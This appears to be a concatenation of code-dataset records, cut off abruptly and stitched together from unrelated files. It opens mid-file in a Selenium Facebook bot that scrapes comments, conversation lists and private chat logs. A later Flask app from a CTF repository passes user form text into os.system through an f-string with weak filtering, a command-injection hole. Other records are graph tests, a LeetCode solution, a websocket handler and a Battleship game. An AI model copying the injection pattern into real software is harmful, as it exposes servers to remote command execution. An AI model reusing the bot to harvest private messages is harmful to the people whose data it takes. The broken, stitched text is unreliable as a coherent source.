authenticated\"))\n\t\t\tself.browser.get(\"https://m.facebook.com/\")\n\t\t\ttime.sleep(2)\n\t\t\tself.browser.find_element_by_xpath('//div[@role=\"textbox\"]').click()\n\t\t\ttextbox = WebDriverWait(self.browser, 10).until(lambda browser: browser.find_element_by_tag_name('textarea'))\n\t\t\ttime.sleep(3)\n\t\t\ttextbox = self.browser.find_element_by_tag_name('textarea')\n\t\t\ttextbox.send_keys(text)\n\t\t\ttime.sleep(3)\n\t\t\ttextbox.submit()\n\n\t\t\ttime.sleep(5)\n\t\n\t\t\tposts = self.browser.find_elements_by_css_selector('article')\n\t\t\tif len(posts) == 0:\n\t\t\t\traise Exception\n\t\t\tfor post in posts:\n\t\t\t\ttoParse = post.get_attribute(\"data-store\")\n\n\t\t\t\t# data-store format:{\"linkdata\":\"top_level_post_id.326230754879551:content_owner_id_new.100031212201704:story_location.6\",\"feedback_target\":326230754879551,\"feedback_source\":0,\"action_source\":0,\"actor_id\":100031212201704}\n\t\t\t\t# what we want: 326230754879551 and 100031212201704\n\n\t\t\t\tpostID = getStringBetween(toParse, \"top_level_post_id.\", \":content_owner_id_new\")\n\t\t\t\tuserID = getStringBetween(toParse, \":content_owner_id_new.\", \":story_location\")\n\t\t\t\t\t\n\t\t\t\tif userID == self.id:\n\t\t\t\t\treturn postID \n\n\t\t\traise Exception(\"cannot find post id\")\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"Profile Post Failed: {e}\")\n\n\t\n\tdef post_group(self, group_id, text):\n\t\t\"\"\"make a post in a group and return the post id\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise(Exception(\"not authenticated\"))\n\t\t\tself.browser.get(f\"https://m.facebook.com/groups/{group_id}\")\n\t\t\tself.browser.find_element_by_xpath('//div[@role=\"textbox\"]').click()\t \n\t\t\ttextbox = self.browser.find_element_by_tag_name('textarea')\n\t\t\ttextbox.send_keys(text)\n\n\t\t\ttime.sleep(10)\n\n\t\t\tself.browser.find_element_by_css_selector('button[data-sigil=\"touchable submit_composer\"]').click()\n\n\t\t\ttime.sleep(5)\n\t\t\t\n\t\t\tposts = self.browser.find_elements_by_css_selector('article')\n\t\t\tif len(posts) == 0:\n\t\t\t\traise Exception(\"could not find any posts\")\n\n\t\t\tfor post in posts:\n\t\t\t\ttoParse = post.get_attribute(\"data-store\")\n\n\t\t\t\t# data-store format:{\"linkdata\":\"top_level_post_id.326230754879551:content_owner_id_new.100031212201704:story_location.6\",\"feedback_target\":326230754879551,\"feedback_source\":0,\"action_source\":0,\"actor_id\":100031212201704}\n\t\t\t\t# what we want: 326230754879551 and 100031212201704\n\n\t\t\t\tpostID = getStringBetween(toParse, \"top_level_post_id.\", \":content_owner_id_new\")\n\t\t\t\tuserID = getStringBetween(toParse, \":content_owner_id_new.\", \":story_location\")\n\t\t\t\t\t\n\t\t\t\tif userID == self.id:\n\t\t\t\t\treturn postID \n\n\t\t\traise Exception(\"cannot find post id\")\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"Group Post Failed: {e}\")\n\n\t\n\tdef accept_all_friends(self):\n\t\t\"\"\"accept all friend requests\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise(Exception(\"not authenticated\"))\n\n\t\t\twhile True:\n\t\t\t\tself.browser.get(\"https://m.facebook.com/friends/center/requests/\")\n\t\t\t\trequests = self.browser.find_elements_by_css_selector('button[value=\"Confirm\"][type=\"submit\"]')\n\t\t\t\t\n\t\t\t\tif len(requests) == 0:\n\t\t\t\t\tbreak\t\t\t\t\n\n\t\t\t\ttry:\n\t\t\t\t\tfor request in requests:\n\t\t\t\t\t\t\twaitingTime = random.uniform(0.5, 1)\t\t\n\t\t\t\t\t\t\ttime.sleep(waitingTime)\n\t\t\t\t\t\t\trequest.click()\n\n\t\t\t\texcept Exception:\t\t\t\t\n\t\t\t\t\tpass\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"Accepting Friend requests failed: {e}\")\n\n\t\n\tdef get_post_IDs_from_group(self, group_id, depth=0):\n\t\t\"\"\"returns a list of the first post ids on a group\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise Exception(\"not authenticated\")\n\t\t\t\n\t\t\tself.browser.get(f\"https://m.facebook.com/groups/{group_id}\")\n\t\t\ttime.sleep(1)\n\t\t\told_height = self.browser.execute_script(\"return document.body.scrollHeight\")\n\t\t\tcur = 0\n\n\t\t\twhile cur < depth:\n\t\t\t\tself.browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\t\t\t\ttime.sleep(6)\n\t\t\t\tnew_height = self.browser.execute_script(\"return document.body.scrollHeight\")\n\t\t\t\tif new_height == old_height:\n\t\t\t\t\tbreak\n\t\t\t\told_height = new_height\n\t\t\t\tcur += 1\n\n\t\t\tposts = self.browser.find_elements_by_css_selector('article[data-dedupekey]')\n\n\t\t\tIDs = []\n\n\t\t\tfor post in posts:\n\n\t\t\t\tdata = post.get_attribute(\"data-store\")\n\t\t\t\t#data-store=\"{\"linkdata\":\"qid.6637150604128350091:mf_story_key.554359628364431:top_level_post_id.554359628364431:tl_objid.554359628364431:content_owner_id_new.100015062925511:text_formatting.518948401838663:src.22:story_location.6\",\"feedback_target\":554359628364431,\"feedback_source\":2,\"action_source\":0,\"actor_id\":100031212201704}\"\n\t\t\t\t#what we want: 554359628364431\n\t\t\t\tpostID = getStringBetween(data, \"story_key.\", \":top_level\")\n\t\t\t\tIDs.append(postID)\n\t\t\tprint(f\"extracted {len(IDs)} posts from group {group_id}\")\n\t\t\treturn IDs\n\t\texcept Exception as e:\n\t\t\tprint(f\"Getting IDs from group {group_id} failed: {e}\")\t\t\t\n\n\t\n\tdef get_comments_from_profile_post(self, post_id):\n\t\t\"\"\"returns a list of comments on a group post\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise(Exception(\"not authenticated\"))\n\t\t\tself.browser.get(f\"https://m.facebook.com/{post_id}\")\n\t\t\tcomments = self.browser.find_elements_by_css_selector('div[data-commentid]')\n\t\t\t\n\t\t\textracted = []\t\n\n\t\t\tfor comment in comments:\n\t\t\t\textracted.append(comment.text)\t\t\n\t\t\t\t\t\t\t\n\t\t\tprint(f\"{len(extracted)} comments extracted from profile post: {post_id}\")\n\t\n\t\t\treturn extracted\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"extracting comments failed: {e}\")\n\n\n\tdef get_comments_from_group_post(self, group_id, post_id):\n\t\t\"\"\"returns a list of comments on a group post\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise(Exception)\n\t\t\tself.browser.get(f\"https://m.facebook.com/groups/{group_id}/permalink/{post_id}\" )\n\n\t\t\twaited = False\n\t\t\twhile True:\n\t\t\t\t#\n\t\t\t\tpreviousComments = self.browser.find_elements_by_css_selector('a[data-sigil=\"ajaxify\"]')\n\t\t\t\tif len(previousComments) == 0:\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tpreviousComments[0].click()\n\t\t\t\t\t\twaited = False\n\t\t\t\t\t\ttime.sleep(1.5)\n\t\t\t\t\texcept Exception:\n\t\t\t\t\t\tif waited:\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttime.sleep(1.5)\n\t\t\t\t\t\t\twaited = True\t\t\n\n\t\t\t#
ds
\n\t\t\tcomments = self.browser.find_elements_by_css_selector('div[data-commentid]')\n\t\t\textracted = []\t\n\n\t\t\tfor comment in comments:\n\t\t\t\textracted.append(comment.text)\t\t\t\t\t\t\n\t\t\tprint(f\"{len(extracted)} comments extracted from group post:{post_id}\")\n\t\t\treturn extracted\t\t\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"Extracting comments from group post failed: {e}\")\n\n\n\tdef get_groups(self):\n\t\t\"\"\" returns a list of groups that the user is currently in \"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise(Exception(\"not authenticated\"))\n\t\t\tself.browser.get(\"https://m.facebook.com/groups/?category=groups\")\n\t\t\tgroups = self.browser.find_elements_by_css_selector('a[href*=\"/groups/\"][aria-labelledby]')\n\n\t\t\textracted = []\n\t\t\tfor group in groups:\n\t\t\t\tuid = group.get_attribute(\"href\").split(\"/\")[4].split(\"?\")[0]\n\t\t\t\textracted.append(uid)\n\t\t\tprint(f\"{len(extracted)} groups are found\")\n\t\t\treturn extracted\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"Getting groups failed: {e}\")\n\n\t\n\tdef get_most_recent_conversations(self, depth=0):\n\t\t\"\"\" returns a list of IDs of the nth users that the account had converstations with \"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\t\traise Exception(\"not authenticated\")\n\t\t\tself.browser.get(\"https://m.facebook.com/messages/\")\n\t\t\tcur = 0\n\t\t\tconversations = []\t\n\n\t\t\twhile cur < depth:\n\t\t\t\ttry:\n\t\t\t\t\tsee_more = self.browser.find_element_by_css_selector('div[id=\"see_older_threads\"] > a')\n\t\t\t\t\tsee_more.click()\n\t\t\t\t\tcur += 1\n\t\t\t\t\ttime.sleep(3)\n\t\t\t\texcept:\n\t\t\t\t\tbreak\n\t\t\t\n\t\t\t\n\t\t\t#id=\"threadlist_row_other_user_fbid_100002156320758\"\n\t\t\tconversations = self.browser.find_elements_by_css_selector('div[id*=\"threadlist_row_other_user_fbid\"]')\n\n\t\t\t\n\t\t\tinfos = []\t\n\t\t\tfor convo in conversations:\n\t\t\t\thref = convo.get_attribute(\"id\")\n\t\t\t\textracted = href.split(\"_\")[-1]\n\t\t\t\tinfos.append(extracted)\t\t\t\n\n\t\t\treturn infos\n\n\t\texcept Exception as e:\n\t\t\tprint(f\"Getting convos failed: {e}\")\n\n\t\n\tdef get_chatlog(self, user_id, depth=0):\n\t\t\"\"\"returns a list of dictionaries that has data of the last messages the account had\n\t\twith the user with user_id\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise Exception(\"not authenticated\")\n\t\t\tself.browser.get(f\"https://m.facebook.com/messages/read/?tid={user_id}\")\t\n\t\t\ttime.sleep(5)\n\t\t\tcur_page = 0\t\t\n\t\t\twhile cur_page < depth:\n\t\t\t\ttry:\n\t\t\t\t\tbutton = self.browser.find_element_by_css_selector('div[id=\"see_older\"] > a')\n\t\t\t\t\tbutton.click()\n\t\t\t\t\ttime.sleep(3)\n\t\t\t\t\tcur_page += 1\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"all convos have loaded\")\n\t\t\t\t\tbreak\n\t\t\t\n\n\t\t\t#
0)\n\n def test_image_video_kohonen(self):\n temp = get_temp_folder(__file__, \"temp_graph_distance\")\n\n graph1 = [\n (\"a\", \"b\"),\n (\"b\", \"c\"),\n (\"b\", \"d\"),\n (\"d\", \"e\"),\n (\"e\", \"f\"),\n (\"b\", \"f\"),\n (\"b\", \"g\"),\n (\"f\", \"g\"),\n (\"a\", \"g\"),\n (\"a\", \"g\"),\n (\"c\", \"d\"),\n (\"d\", \"g\"),\n (\"d\", \"h\"),\n (\"aa\", \"h\"),\n (\"aa\", \"c\"),\n (\"f\", \"h\"),\n ]\n graph2 = copy.deepcopy(graph1) + [\n (\"h\", \"m\"),\n (\"m\", \"l\"),\n (\"l\", \"C\"),\n (\"C\", \"r\"),\n (\"a\", \"k\"),\n (\"k\", \"l\"),\n (\"k\", \"C\"),\n ]\n\n graph1 = GraphDistance(graph1)\n graph2 = GraphDistance(graph2)\n\n graph2[\"C\"].label = \"c\"\n store = {}\n if len(list(graph1.enumerate_all_paths(True))) != 17:\n raise AssertionError(\"expecting 17 here\")\n if len(list(graph2.enumerate_all_paths(True))) != 19:\n raise AssertionError(\"expecting 19 here\")\n\n distance, graph = graph1.distance_matching_graphs_paths(\n graph2, use_min=False, store=store\n )\n\n if graph[\"h\"].Label != \"h\":\n raise AssertionError(\"we expect this node to be merged in the process\")\n\n if distance is None:\n raise AssertionError(\"expecting something different from None\")\n\n outfile1 = os.path.join(temp, \"unittest_GraphDistance4_sub1.png\")\n outfile2 = os.path.join(temp, \"unittest_GraphDistance4_sub2.png\")\n outfilef = os.path.join(temp, \"unittest_GraphDistance4_subf.png\")\n\n vertices, edges = graph1.draw_vertices_edges()\n self.assertNotEmpty(vertices)\n self.assertNotEmpty(edges)\n try:\n draw_graph_graphviz(vertices, edges, outfile1)\n except FileNotFoundError as e:\n if \"No such file or directory: 'dot'\" in str(e):\n return\n raise e\n\n vertices, edges = graph2.draw_vertices_edges()\n self.assertNotEmpty(vertices)\n self.assertNotEmpty(edges)\n draw_graph_graphviz(vertices, edges, outfile2)\n self.assertTrue(os.path.exists(outfile2))\n\n vertices, edges = graph.draw_vertices_edges()\n self.assertNotEmpty(vertices)\n self.assertNotEmpty(edges)\n draw_graph_graphviz(vertices, edges, outfilef)\n self.assertTrue(os.path.exists(outfilef))\n\n def test_unittest_GraphDistance2(self):\n graph1 = [\n (\"a\", \"b\"),\n (\"b\", \"c\"),\n (\"b\", \"X\"),\n (\"X\", \"c\"),\n (\"c\", \"d\"),\n (\"d\", \"e\"),\n (\"0\", \"b\"),\n ]\n graph2 = [\n (\"a\", \"b\"),\n (\"b\", \"c\"),\n (\"b\", \"X\"),\n (\"X\", \"c\"),\n (\"c\", \"t\"),\n (\"t\", \"d\"),\n (\"d\", \"e\"),\n (\"d\", \"g\"),\n ]\n graph1 = GraphDistance(graph1)\n graph2 = GraphDistance(graph2)\n store = {}\n res, out, err = self.capture(\n lambda: graph1.distance_matching_graphs_paths(\n graph2, use_min=False, store=store, verbose=True\n )\n )\n self.assertIn(\"[distance_matching_graphs_paths]\", out)\n self.assertIn(\"#\", err)\n distance, graph = res\n if distance is None:\n raise TypeError(\"expecting something different from None\")\n allPaths = list(graph.enumerate_all_paths(True))\n if len(allPaths) == 0:\n raise ValueError(\"the number of paths should not be null\")\n if distance == 0:\n raise ValueError(\"expecting a distance > 0\")\n vertices, edges = graph.draw_vertices_edges()\n self.assertNotEmpty(vertices)\n self.assertNotEmpty(edges)\n # GV.drawGraphEdgesVertices (vertices,edges, \"unittest_GraphDistance2.png\")\n node = graph.vertices[\"X\"]\n if None in node.pair:\n raise RuntimeError(\"unexpected, this node should be part of the common set\")\n\n vertices, edges = graph1.draw_vertices_edges()\n self.assertNotEmpty(vertices)\n # GV.drawGraphEdgesVertices (vertices,edges, \"unittest_GraphDistance2_sub1.png\")\n vertices, edges = graph2.draw_vertices_edges()\n self.assertNotEmpty(vertices)\n # GV.drawGraphEdgesVertices (vertices,edges, \"unittest_GraphDistance2_sub2.png\")\n\n def test_unittest_common_paths(self):\n graph1 = [\n (\"a\", \"b\"),\n (\"b\", \"c\"),\n (\"b\", \"X\"),\n (\"X\", \"c\"),\n (\"c\", \"d\"),\n (\"d\", \"e\"),\n (\"0\", \"b\"),\n ]\n graph2 = graph1\n graph1 = GraphDistance(graph1)\n graph2 = GraphDistance(graph2)\n common12 = graph1.common_paths(graph2)\n common21 = graph2.common_paths(graph1)\n s1 = str(common12)\n s2 = repr(common12)\n self.assertIn(\"c-c -> d-d []\", s1)\n self.assertIn(\"[Edge('0-0', 'b-b', '', 1.0)\", s2)\n self.assertIn(\"{'0-0': Vertex('0-0', '0', 1.0)\", s2)\n self.assertEqual(len(graph1.vertices), len(common12.vertices))\n self.assertEqual(len(graph1.vertices), len(common21.vertices))\n self.assertEqual(len(graph1.edges), len(common21.edges))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"sdpython/mlstatpy","sub_path":"_unittests/ut_graph/test_graph_distance.py","file_name":"test_graph_distance.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"27"} +{"seq_id":"10452848344","text":"class Solution:\n def maximumCostSubstring(self, s: str, chars: str, vals: List[int]) -> int:\n \n# Kadane's Algorithm Implementation \n \n d1={chr(i+96):i for i in range(1,27)}\n \n curr,curr_max=0,0\n \n for i in range(len(chars)):\n \n d1[chars[i]]=vals[i]\n \n for i in s:\n \n curr=max(0,curr+d1[i])\n \n curr_max=max(curr_max,curr)\n \n return curr_max","repo_name":"priyamshukla-coder/IMP-DSA-Questions-Solutions","sub_path":"Find Substring With Maximum Cost.py","file_name":"Find Substring With Maximum Cost.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"44333933759","text":"# -*- coding: utf-8 -*-\n\nfrom traceback import format_exc\nfrom utils import BetterDict\nfrom aiohttp import web\nimport json\n\n\nclass Socket:\n def __init__(self, sock, id):\n self.sock = sock\n self.id = id\n\n async def send(self, event_type, **kwargs):\n kwargs.update({'type': event_type})\n await self.sock.send_json(kwargs)\n\n\nclass WSHandler(web.View):\n async def get(self):\n sock = web.WebSocketResponse(heartbeat=2.0)\n await sock.prepare(self.request)\n app = self.request.app\n\n socket = Socket(sock, self.request.data['auth']['subset']['vk_user_id'])\n is_manager_connected = True if app.manager else False\n\n try:\n if self.request.data.role == 'manager':\n if not app.manager:\n app.manager = socket\n await socket.send('connected', slaves=len(app.sockets))\n await self.broadcast('manager_connected')\n else:\n await sock.close(message=b'taken')\n else:\n app.sockets.update({socket.id: socket})\n await socket.send('connected', hasManager=is_manager_connected, playing=app.playing)\n\n if app.manager:\n await app.manager.send('update_slaves', slaves=len(app.sockets))\n\n async for event in sock:\n try:\n event = BetterDict(json.loads(event.data))\n if self.request.data.role == 'manager':\n if event.type == 'play':\n app.playing = True\n elif event.type == 'stop':\n app.playing = False\n await self.broadcast(event.type)\n except:\n await socket.send('error', code=500)\n print(format_exc())\n\n finally:\n if socket.id in app.sockets:\n app.sockets.pop(socket.id)\n if self.request.data.role == 'manager' and not is_manager_connected:\n await self.broadcast('manager_disconnected')\n app.manager = None\n else:\n if app.manager:\n await app.manager.send('update_slaves', slaves=len(app.sockets))\n await sock.close()\n\n return sock\n\n async def broadcast(self, event_type, **kwargs):\n for id, socket in self.request.app.sockets.items():\n await socket.send(event_type, **kwargs)\n","repo_name":"Mkolba/vezdekod-final","sub_path":"vkma-task-4/api/api/websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5307687956","text":"from flask import Flask, request, redirect, url_for\nimport os\nimport random\nimport string\nimport time \n\nclean = time.time()\napp = Flask(__name__)\nchars = list(string.ascii_letters + string.digits)\n\n@app.route('/')\ndef main():\n return open(\"index.html\").read()\n\n@app.route('/generate', methods=['POST'])\ndef upload():\n global clean\n if time.time() - clean > 60:\n os.system(\"rm static/images/*\")\n clean = time.time()\n data = request.form.getlist('text')[0]\n data = data.replace(\"\\\"\", \"\")\n data = data.replace(\"$\",\"\")\n name = \"\".join(random.choices(chars,k=8)) + \".png\"\n os.system(f\"python3 gene.py {name} \\\"{data}\\\"\")\n return redirect(url_for('static', filename='images/' + name), code=301)\n \nif __name__ == \"__main__\":\n app.run(\"0.0.0.0\",80)\n","repo_name":"xf1les/2021JNUCTF","sub_path":"WEB/PictureGenerator/build/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"27"} +{"seq_id":"31005529728","text":"from math import sqrt\n\n\nclass CosineSimilarity(object):\n \"\"\"\n Cosine similarity implementation for text summarization.\n \"\"\"\n\n @staticmethod\n def get_cosine_similarity(tf_idf_a, tf_idf_b):\n dot_product = CosineSimilarity.get_dot_product(tf_idf_a, tf_idf_b)\n magnitude_a = CosineSimilarity.get_magnitude(tf_idf_a)\n magnitude_b = CosineSimilarity.get_magnitude(tf_idf_b)\n\n return dot_product / (magnitude_a * magnitude_b)\n\n @staticmethod\n def get_magnitude(tf_idf):\n magnitude = 0.0\n\n for word in tf_idf:\n magnitude += pow(tf_idf[word], 2)\n\n return sqrt(magnitude)\n\n @staticmethod\n def get_dot_product(tf_idf_a, tf_idf_b):\n dot_product = 0.0\n\n for word in tf_idf_a:\n dot_product += tf_idf_a[word] * tf_idf_b[word]\n\n return dot_product\n","repo_name":"franfj/Summarizer","sub_path":"summarizer/src/algo/tools/cosine_similarity.py","file_name":"cosine_similarity.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"} +{"seq_id":"40949260086","text":"class A:\r\n def method1(self):\r\n print(\"Class A and MethodA\")\r\n\r\n\r\nclass B:\r\n def method1(self):\r\n print(\"Class B and MethodB\")\r\n\r\n\r\nclass C(B, A):\r\n # def method1(self):\r\n print(\"Class C and MethodC\")\r\n\r\n\r\nObj = C()\r\n# obj.methodC\r\nObj.method1()\r\n\r\n\r\n# yield keyword will have ability to convert any function to Generator and returns the object values'\r\ndef fun(n):\r\n a, b = 0, 1\r\n for j in range(0, n):\r\n a, b = b, a + b\r\n # print(\"after assignment:: \",a,b)\r\n # a=b\r\n # b=a+b\r\n yield a\r\n\r\n\r\nfor i in fun(5):\r\n print(i)\r\n\r\n\r\n# global variable\r\ndef a():\r\n # b = 10\r\n global b\r\n b = 1\r\n\r\n\r\ndef b1():\r\n a()\r\n print(\"Value\", b)\r\n\r\n\r\n# try except else finally\r\ndef divide(x,y):\r\n\r\n try:\r\n r= x /y\r\n except Exception as e:\r\n print(\"SOrry u r dividing by zero:: \",e)\r\n else:\r\n print(\"else\",x/5)\r\n finally:\r\n print(\"finally\")\r\ndivide(3, 2)\r\ndivide(3, 0)\r\n\r\n# for k,v in dict.items():\r\n# print(k,v)\r\n\r\nst = \"raja reddy@ v!\"\r\nalphanumeric=\"\"\r\ncnt=\"\"\r\nfor char in st:\r\n if char.isalnum():\r\n alphanumeric+=char\r\n else:\r\n cnt+=char\r\n\r\nprint(alphanumeric)\r\nprint(\"special char and space:: \",cnt)\r\n","repo_name":"raja08blr/PythonExamples","sub_path":"MutlipleInheritance.py","file_name":"MutlipleInheritance.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26976439757","text":"\nimport random\n\nHIT_CHAR = 'x'\nMISS_CHAR = 'o'\nBLANK_CHAR = '.'\nHORIZONTAL = 'h'\nVERTICAL = 'v'\nMAX_MISSES = 20\nSHIP_SIZES = {\n \"carrier\": 5,\n \"battleship\": 4,\n \"cruiser\": 3,\n \"submarine\": 3,\n \"destroyer\": 2\n}\nNUM_ROWS = 10\nNUM_COLS = 10\nROW_IDX = 0\nCOL_IDX = 1\nMIN_ROW_LABEL = 'A'\nMAX_ROW_LABEL = 'J'\n\n\ndef get_random_position():\n \"\"\"Generates a random location on a board of NUM_ROWS x NUM_COLS.\"\"\"\n\n row_choice = chr(\n random.choice(\n range(\n ord(MIN_ROW_LABEL),\n ord(MIN_ROW_LABEL) + NUM_ROWS\n )\n )\n )\n\n col_choice = random.randint(0, NUM_COLS - 1)\n\n return (row_choice, col_choice)\n\n\ndef play_battleship():\n \"\"\"Controls flow of Battleship games including display of\n welcome and goodbye messages.\n\n :return: None\n \"\"\"\n\n print(\"Let's Play Battleship!\\n\")\n\n game_over = False\n\n while not game_over:\n\n game = Game()\n game.display_board()\n\n while not game.is_complete():\n pos = game.get_guess()\n result = game.check_guess(pos)\n game.update_game(result, pos)\n game.display_board()\n\n game_over = end_program()\n\n print(\"Goodbye.\")\n\n### DO NOT EDIT ABOVE (with the exception of MAX_MISSES) ###\n\n\nclass Ship:\n\n def __init__(self, name, start_position, orientation):\n \"\"\"Creates a new ship with the given name, placed at start_position in the\n provided orientation. The number of positions occupied by the ship is determined\n by looking up the name in the SHIP_SIZE dictionary.\n :param name: the name of the ship\n :param start_position: tuple representing the starting position of ship on the board\n :param orientation: the orientation of the ship ('v' - vertical, 'h' - horizontal)\n :return: None\n \"\"\"\n self.name = name\n self.positions = {}\n self.orientation = orientation\n self.sunk = False\n\n if self.orientation == VERTICAL:\n for position in range(SHIP_SIZES[self.name]):\n self.positions[(chr(ord(start_position[0]) + position)), start_position[1]] = False\n else:\n for position in range(SHIP_SIZES[self.name]):\n self.positions[(start_position[0], start_position[1] + position)] = False\n\n\n\nclass Game:\n\n def __init__(self, max_misses = MAX_MISSES):\n \"\"\" Creates a new game with max_misses possible missed guesses.\n The board is initialized in this function and ships are randomly\n placed on the board.\n :param max_misses: maximum number of misses allowed before game ends\n \"\"\"\n self.max_misses = max_misses\n self.ships = []\n self.guesses = []\n self.board = {}\n self.initialize_board()\n self.create_and_place_ships()\n\n def initialize_board(self):\n \"\"\"Sets the board to it's initial state with each position occupied by\n a period ('.') string.\n :return: None\n \"\"\"\n\n for position in range(NUM_COLS):\n self.board[(chr(ord(MIN_ROW_LABEL) + position))] = [BLANK_CHAR] * NUM_COLS\n\n def in_bounds(self, start_position, ship_size, orientation):\n \"\"\"Checks that a ship requiring ship_size positions can be placed at start position.\n :param start_position: tuple representing the starting position of ship on the board\n :param ship_size: number of positions needed to place ship\n :param orientation: the orientation of the ship ('v' - vertical, 'h' - horizontal)\n :return status: True if ship placement inside board boundary, False otherwise\n\n\n\"\"\"\n if orientation == VERTICAL:\n for position in range(ship_size):\n if chr(ord(start_position[0]) + position) not in self.board:\n #if (chr(ord(start_position[0]) + position) > MAX_ROW_LABEL) or (ord(start_position[0]) + position) < ord(MIN_ROW_LABEL):\n return False\n return True\n else:\n for position in range(ship_size):\n if start_position[1] + position >= NUM_COLS:\n return False\n return True\n\n\n\n def overlaps_ship(self, start_position, ship_size, orientation):\n \"\"\"Checks for overlap between previously placed ships and a potential new ship\n placement requiring ship_size positions beginning at start_position in the\n given orientation.\n :param start_position: tuple representing the starting position of ship on the board\n :param ship_size: number of positions needed to place ship\n :param orientation: the orientation of the ship ('v' - vertical, 'h' - horizontal)\n :return status: True if ship placement overlaps previously placed ship, False otherwise\n \"\"\"\n\n if orientation == VERTICAL:\n for position in range(ship_size):\n new_position = (chr(ord(start_position[0]) + position), start_position[1])\n for j in range(len(self.ships)):\n if new_position in self.ships[j].positions:\n return True\n return False\n else:\n for position in range(ship_size):\n new_position = (start_position[0], start_position[1] + position)\n for j in range(len(self.ships)):\n if new_position in self.ships[j].positions:\n return True\n return False\n\n\n def place_ship(self, start_position, ship_size):\n \"\"\"Determines if placement is possible for ship requiring ship_size positions placed at\n start_position. Returns the orientation where placement is possible or None if no placement\n in either orientation is possible.\n :param start_position: tuple representing the starting position of ship on the board\n :param ship_size: number of positions needed to place ship\n :return orientation: 'h' if horizontal placement possible, 'v' if vertical placement possible,\n None if no placement possible\n \"\"\"\n\n if self.in_bounds(start_position, ship_size, HORIZONTAL) is True and self.overlaps_ship(start_position, ship_size, HORIZONTAL) is False:\n return HORIZONTAL\n elif self.in_bounds(start_position, ship_size, VERTICAL) is True and self.overlaps_ship(start_position, ship_size, VERTICAL) is False:\n return VERTICAL\n else:\n return None\n\n def create_and_place_ships(self):\n \"\"\"Instantiates ship objects with valid board placements.\n :return: None\n \"\"\"\n\n for ship in self._ship_types:\n random_pos = get_random_position()\n placement = self.place_ship(random_pos, SHIP_SIZES[ship])\n while placement is None:\n random_pos = get_random_position()\n placement = self.place_ship(random_pos, SHIP_SIZES[ship])\n\n ship = Ship(ship, random_pos, placement)\n self.ships.append(ship)\n\n def get_guess(self):\n \"\"\"Prompts the user for a row and column to attack. The\n return value is a board position in (row, column) format\n :return position: a board position as a (row, column) tuple\n \"\"\"\n\n running = True\n row = input(\"Enter a row: \")\n while running is True:\n if ord(row) in range(ord('A'), ord('K')):\n col = int(input(\"Enter a column: \"))\n if col in range(9):\n running = False\n return row, col\n else:\n row = input(\"Enter a row: \")\n\n\n def check_guess(self, position):\n \"\"\"Checks whether or not position is occupied by a ship. A hit is\n registered when position occupied by a ship and position not hit\n previously. A miss occurs otherwise.\n :param position: a (row,column) tuple guessed by user\n :return: guess_status: True when guess results in hit, False when guess results in miss\n \"\"\"\n\n sunks = False\n for ship in self.ships:\n if position in ship.positions and ship.positions.get(position) is False:\n ship.positions[position] = True\n sunks = True\n elif position not in ship.positions or ship.positions.get(position) is True:\n return sunks\n\n counter = 0\n for position in ship.positions:\n if ship.positions.get(position) is True:\n counter += 1\n if counter == len(ship.positions):\n ship.sunk = True\n print(\"You sunk the \" + ship.name + '!')\n sunks = True\n return sunks\n\n def update_game(self, guess_status, position):\n \"\"\"Updates the game by modifying the board with a hit or miss\n symbol based on guess_status of position.\n :param guess_status: True when position is a hit, False otherwise\n :param position: a (row,column) tuple guessed by user\n :return: None\n \"\"\"\n\n if self.board[position[ROW_IDX]][position[COL_IDX]] == BLANK_CHAR:\n if guess_status is False:\n self.board[position[ROW_IDX]][position[COL_IDX]] = MISS_CHAR\n else:\n self.board[position[ROW_IDX]][position[COL_IDX]] = HIT_CHAR\n if guess_status is False:\n self.guesses.append(position)\n\n def is_complete(self):\n \"\"\"Checks to see if a Battleship game has ended. Returns True when the game is complete\n with a message indicating whether the game ended due to successfully sinking all ships\n or reaching the maximum number of guesses. Returns False when the game is not\n complete.\n :return: True on game completion, False otherwise\n \"\"\"\n\n sunk_ship = 0\n for ship in self.ships:\n if ship.sunk is True:\n sunk_ship += 1\n\n if sunk_ship == len(self.ships):\n print(\"YOU WIN!\")\n return True\n elif len(self.guesses) == MAX_MISSES:\n print(\"SORRY! NO GUESSES LEFT.\")\n return True\n else:\n return False\n\n\n\n ########## DO NOT EDIT #########\n \n _ship_types = [\"carrier\", \"battleship\", \"cruiser\", \"submarine\", \"destroyer\"]\n \n \n def display_board(self):\n \"\"\" Displays the current state of the board.\"\"\"\n\n print()\n print(\" \" + ' 